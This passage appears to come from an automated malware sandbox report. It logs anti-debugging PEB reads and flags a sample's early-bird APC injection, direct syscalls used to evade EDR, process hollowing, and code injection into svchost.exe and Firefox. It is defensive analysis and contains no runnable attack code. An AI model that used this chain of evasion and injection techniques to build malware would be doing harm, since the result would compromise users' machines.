            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_035050D9 mov eax, dword ptr fs:[00000030h]8_2_035050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034AD0C0 mov eax, dword ptr fs:[00000030h]8_2_034AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034AD0C0 mov eax, dword ptr fs:[00000030h]8_2_034AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B20DE mov eax, dword ptr fs:[00000030h]8_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034590DB mov eax, dword ptr fs:[00000030h]8_2_034590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034550E4 mov eax, dword ptr fs:[00000030h]8_2_034550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034550E4 mov ecx, dword ptr fs:[00000030h]8_2_034550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034380E9 mov eax, dword ptr fs:[00000030h]8_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342C0F0 mov eax, dword ptr fs:[00000030h]8_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034720F0 mov ecx, dword ptr fs:[00000030h]8_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343208A mov eax, dword ptr fs:[00000030h]8_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342D08D mov eax, dword ptr fs:[00000030h]8_2_0342D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03435096 mov eax, dword ptr fs:[00000030h]8_2_03435096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345D090 mov eax, dword ptr fs:[00000030h]8_2_0345D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345D090 mov eax, dword ptr fs:[00000030h]8_2_0345D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346909C mov eax, dword ptr fs:[00000030h]8_2_0346909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F60B8 mov eax, dword ptr fs:[00000030h]8_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F60B8 mov ecx, dword ptr fs:[00000030h]8_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03443740 mov eax, dword ptr fs:[00000030h]8_2_03443740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03443740 mov eax, dword ptr fs:[00000030h]8_2_03443740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03443740 mov eax, dword ptr fs:[00000030h]8_2_03443740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346674D mov esi, dword ptr fs:[00000030h]8_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346674D mov eax, dword ptr fs:[00000030h]8_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346674D mov eax, dword ptr fs:[00000030h]8_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03430750 mov eax, dword ptr fs:[00000030h]8_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472750 mov eax, dword ptr fs:[00000030h]8_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472750 mov eax, dword ptr fs:[00000030h]8_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03503749 mov eax, dword ptr fs:[00000030h]8_2_03503749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B4755 mov eax, dword ptr fs:[00000030h]8_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B765 mov eax, dword ptr fs:[00000030h]8_2_0342B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B765 mov eax, dword ptr fs:[00000030h]8_2_0342B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B765 mov eax, dword ptr fs:[00000030h]8_2_0342B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B765 mov eax, dword ptr fs:[00000030h]8_2_0342B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03438770 mov eax, dword ptr fs:[00000030h]8_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]8_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]8_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]8_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]8_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]8_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]8_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]8_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]8_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]8_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]8_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]8_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]8_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03437703 mov eax, dword ptr fs:[00000030h]8_2_03437703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03435702 mov eax, dword ptr fs:[00000030h]8_2_03435702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03435702 mov eax, dword ptr fs:[00000030h]8_2_03435702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346C700 mov eax, dword ptr fs:[00000030h]8_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03430710 mov eax, dword ptr fs:[00000030h]8_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03460710 mov eax, dword ptr fs:[00000030h]8_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346F71F mov eax, dword ptr fs:[00000030h]8_2_0346F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346F71F mov eax, dword ptr fs:[00000030h]8_2_0346F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EF72E mov eax, dword ptr fs:[00000030h]8_2_034EF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03433720 mov eax, dword ptr fs:[00000030h]8_2_03433720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344F720 mov eax, dword ptr fs:[00000030h]8_2_0344F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344F720 mov eax, dword ptr fs:[00000030h]8_2_0344F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344F720 mov eax, dword ptr fs:[00000030h]8_2_0344F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F972B mov eax, dword ptr fs:[00000030h]8_2_034F972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346C720 mov eax, dword ptr fs:[00000030h]8_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346C720 mov eax, dword ptr fs:[00000030h]8_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0350B73C mov eax, dword ptr fs:[00000030h]8_2_0350B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0350B73C mov eax, dword ptr fs:[00000030h]8_2_0350B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0350B73C mov eax, dword ptr fs:[00000030h]8_2_0350B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0350B73C mov eax, dword ptr fs:[00000030h]8_2_0350B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429730 mov eax, dword ptr fs:[00000030h]8_2_03429730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429730 mov eax, dword ptr fs:[00000030h]8_2_03429730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03465734 mov eax, dword ptr fs:[00000030h]8_2_03465734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343973A mov eax, dword ptr fs:[00000030h]8_2_0343973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343973A mov eax, dword ptr fs:[00000030h]8_2_0343973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346273C mov eax, dword ptr fs:[00000030h]8_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346273C mov ecx, dword ptr fs:[00000030h]8_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346273C mov eax, dword ptr fs:[00000030h]8_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034AC730 mov eax, dword ptr fs:[00000030h]8_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343C7C0 mov eax, dword ptr fs:[00000030h]8_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034357C0 mov eax, dword ptr fs:[00000030h]8_2_034357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034357C0 mov eax, dword ptr fs:[00000030h]8_2_034357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034357C0 mov eax, dword ptr fs:[00000030h]8_2_034357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343D7E0 mov ecx, dword ptr fs:[00000030h]8_2_0343D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034527ED mov eax, dword ptr fs:[00000030h]8_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034527ED mov eax, dword ptr fs:[00000030h]8_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034527ED mov eax, dword ptr fs:[00000030h]8_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034347FB mov eax, dword ptr fs:[00000030h]8_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034347FB mov eax, dword ptr fs:[00000030h]8_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EF78A mov eax, dword ptr fs:[00000030h]8_2_034EF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B97A9 mov eax, dword ptr fs:[00000030h]8_2_034B97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034BF7AF mov eax, dword ptr fs:[00000030h]8_2_034BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034BF7AF mov eax, dword ptr fs:[00000030h]8_2_034BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034BF7AF mov eax, dword ptr fs:[00000030h]8_2_034BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034BF7AF mov eax, dword ptr fs:[00000030h]8_2_034BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034BF7AF mov eax, dword ptr fs:[00000030h]8_2_034BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_035037B6 mov eax, dword ptr fs:[00000030h]8_2_035037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034307AF mov eax, dword ptr fs:[00000030h]8_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345D7B0 mov eax, dword ptr fs:[00000030h]8_2_0345D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]8_2_0342F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]8_2_0342F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]8_2_0342F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]8_2_0342F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]8_2_0342F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]8_2_0342F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]8_2_0342F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]8_2_0342F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]8_2_0342F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344C640 mov eax, dword ptr fs:[00000030h]8_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F866E mov eax, dword ptr fs:[00000030h]8_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F866E mov eax, dword ptr fs:[00000030h]8_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346A660 mov eax, dword ptr fs:[00000030h]8_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346A660 mov eax, dword ptr fs:[00000030h]8_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03469660 mov eax, dword ptr fs:[00000030h]8_2_03469660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03469660 mov eax, dword ptr fs:[00000030h]8_2_03469660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03462674 mov eax, dword ptr fs:[00000030h]8_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03461607 mov eax, dword ptr fs:[00000030h]8_2_03461607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034AE609 mov eax, dword ptr fs:[00000030h]8_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346F603 mov eax, dword ptr fs:[00000030h]8_2_0346F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344260B mov eax, dword ptr fs:[00000030h]8_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344260B mov eax, dword ptr fs:[00000030h]8_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344260B mov eax, dword ptr fs:[00000030h]8_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344260B mov eax, dword ptr fs:[00000030h]8_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344260B mov eax, dword ptr fs:[00000030h]8_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344260B mov eax, dword ptr fs:[00000030h]8_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344260B mov eax, dword ptr fs:[00000030h]8_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03433616 mov eax, dword ptr fs:[00000030h]8_2_03433616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03433616 mov eax, dword ptr fs:[00000030h]8_2_03433616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472619 mov eax, dword ptr fs:[00000030h]8_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344E627 mov eax, dword ptr fs:[00000030h]8_2_0344E627
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Early bird code injection technique detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeNtTerminateThread: Direct from: 0x77377B2EJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: NULL target: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 1096Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeJump to behavior
            Sample uses process hollowing technique
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe base address: 400000Jump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe base: 1660000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe "C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe"Jump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
